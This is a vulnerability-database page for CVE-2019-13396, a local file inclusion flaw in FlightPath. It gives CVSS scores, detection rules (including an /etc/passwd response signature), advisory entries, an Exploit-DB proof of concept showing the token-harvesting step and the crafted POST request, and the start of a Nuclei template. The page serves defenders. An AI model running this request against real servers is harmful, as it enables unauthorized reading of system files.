CVE-2019-13396
published 2019-07-10CVE-2019-13396: FlightPath 4.x and 5.0-x allows directory traversal and Local File Inclusion through the form_include parameter in an index.php?q=system-handle-form-submit…
PriorityP180medium5.3CVSS 3.0
AVNACLPRNUINSUCLINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
62.57%
99.1th percentile
FlightPath 4.x and 5.0-x allows directory traversal and Local File Inclusion through the form_include parameter in an index.php?q=system-handle-form-submit POST request because of an include_once in system_handle_form_submit in modules/system/system.module.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getflightpath | flightpath | — | — |
| getflightpath | flightpath | 4.0 – 4.8.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for POST requests to index.php?q=system-handle-form-submit containing the 'form_include' parameter with directory traversal sequences (e.g., '../'). ↗
- →Exploitation requires a valid form_token, which the attacker first retrieves via a GET /login request (even with invalid credentials). Monitor for rapid GET /login followed by POST to system-handle-form-submit. ↗
- →The vulnerable parameter is 'form_include' in the POST body, processed by include_once in system_handle_form_submit inside modules/system/system.module. Alert on any non-empty form_include value containing path traversal characters. ↗
- →Successful exploitation of LFI to read /etc/passwd will produce a response body matching the pattern 'root:.*:0:0:'. Use this as a response-based detection signature.
- ·The exploit requires a two-step process: first obtain a valid form_token via GET /login, then use it in the malicious POST. Detection rules must account for this token-harvesting pre-step. ↗
- ·The vulnerability affects FlightPath versions prior to 4.8.2 and 5.0-rc2 only. Scope detection rules to these version ranges.
CVSS provenance
nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7hrr-3p9q-x2q8: FlightPath 4
ghsa_unreviewed·2022-05-24
CVE-2019-13396 [MEDIUM] CWE-22 GHSA-7hrr-3p9q-x2q8: FlightPath 4
FlightPath 4.x and 5.0-x allows directory traversal and Local File Inclusion through the form_include parameter in an index.php?q=system-handle-form-submit POST request because of an include_once in system_handle_form_submit in modules/system/system.module.
VulnCheck
getflightpath flightpath Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2019·CVSS 5.3
CVE-2019-13396 [MEDIUM] getflightpath flightpath Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
getflightpath flightpath Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
FlightPath 4.x and 5.0-x allows directory traversal and Local File Inclusion through the form_include parameter in an index.php?q=system-handle-form-submit POST request because of an include_once in system_handle_form_submit in modules/system/system.module.
Affected: getflightpath flightpath
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-05-11&host_type=src&vulnerability=cve-2019-13396
No detection rules found.
Exploit-DB
FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion
exploitdb·2019-07-15·CVSS 5.3
CVE-2019-13396 [MEDIUM] FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion
FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion
---
# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Date: 07-07-2019
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396
# Parameters : include_form
# POST Method:
use the login form to get right form_token [ you can use wrong user/pass ]
This is how to POST looks like:
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26a
Nuclei
FlightPath - Local File Inclusion
nuclei·CVSS 5.3
CVE-2019-13396 [MEDIUM] FlightPath - Local File Inclusion
FlightPath - Local File Inclusion
FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
Template:
id: CVE-2019-13396
info:
name: FlightPath - Local File Inclusion
author: 0x_Akoko,daffainfo
severity: medium
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
impact: |
This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/47121
- http://getflightpath.com/node/2650
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3
No writeups or analysis indexed.
2019-07-10
Published
Exploited in the wild